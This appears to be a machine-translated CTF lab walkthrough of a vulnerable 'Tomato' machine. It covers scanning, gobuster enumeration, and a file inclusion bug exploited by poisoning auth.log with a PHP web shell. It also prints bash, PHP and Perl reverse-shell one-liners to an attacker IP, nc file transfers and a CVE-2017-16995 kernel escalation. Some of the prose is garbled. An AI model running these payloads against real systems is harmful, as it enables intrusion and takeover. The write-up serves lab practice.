Catalog

One 、 The host found

Two 、 Port scanning

3、 ... and 、 Service version discovery

Four 、 information gathering

5、 ... and 、 Expand supply side scanning catalogue

1.dirsearch General dictionary

2.gobuster

6、 ... and 、/antibot_image information gathering

7、 ... and 、 File contains

8、 ... and 、 rebound shell

Nine 、 Kernel vulnerability enumeration rights

 1. Tools linux-exploit-suggester

2. Transmission tools

3. Try one by one

Ten 、CVE-2017-16995

One 、 The host found

Two 、 Port scanning

3、 ... and 、 Service version discovery

Open two http Service port , The middleware used is different .

21 Port deployment ftp

2211 Port deployment ssh service

I also know that this is unbuntu System .

Four 、 information gathering

1.80

Sure enough, it's a big tomato , Check the source code regularly , Useful business information

2.8888

  Login box , The most classic attempt , Weak password . Can't succeed

5、 ... and 、 Expand supply side scanning catalogue

1.dirsearch General dictionary

Nothing , Change a big dictionary dirsearch Run very slowly , So change gobuster

2.gobuster

Is based on go Language development , Fast

gobuster dir -u  http://192.168.0.101 -w /usr/share/seclists/Discovery/Web-Content/common.txt

301 The status code attracts our attention

6、 ... and 、/antibot_image information gathering

1. Judging from the image, the anti crawler application in the server deployment

2.info.php file

So that's one phpinfo file , There is switch configuration information , Server environment , Configuration file directory, etc

3.info.php File source code

There is information leakage in the comments , It's obviously a include The file contains functions

7、 ... and 、 File contains

 1. Parameter contains the local file

2. For remote files, include

Practice ： stay kali Create a php file , To remotely include , Failure

Conditions ： Simply speaking long-range File contains , It can contain files on other hosts , And as php Code execution .
To achieve long-range If the file contains ,php Configured allow_url_include = on It has to be for on（ Turn on ）

This is from phpinfo It can also be seen in . He didn't drive

3. View the private key through File Inclusion Vulnerability

Failure , He didn't /home/tomato/.ssh/id_rsa

4. see ubuntu Log files

/var/log/auth.log

This log is unbuntu The default log of login failure . So we can use ssh perhaps ftp Login failure injection code .

5. test

ssh [email protected] -p 2211

Sure enough, we entered aaaaaaaaaaaa All appear on it , Change him into a Trojan horse

6. Write the command to execute the Trojan horse to the log

<?php echo system($_GET['cc'])?>

When writing this ,php The code does not show , Prove that the server exists php Running environment , The injection script parses normally

7. Parameter test

view-source:http://192.168.0.101/antibot_image/antibots/info.php?image=/var/log/auth.log&cc=id

8、 ... and 、 rebound shell

The use of python Rebound success

 1.bash

bash -i >& /dev/tcp/192.168.0.104/4444 0>&1

2.php

php -r '$sock=fsockopen(" Control terminal ip", Control end port );exec("/bin/bash -i <&3 >&3 2>&3");'

3.perl

perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"192.168.0.104:7777");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

Nine 、 Kernel vulnerability enumeration rights

 1. Tools linux-exploit-suggester

sudo apt install linux-exploit-suggester

2. Transmission tools

Server side ：

nc -nvlp 4444 > 1.sh

client ：

nc 192.168.0.101 4444 < linux-exploit-suggester.sh -w 1

3. Try one by one

Ten 、CVE-2017-16995

stay kali End use gcc After compiling ,nc Upload , Give authority , Finally, execute .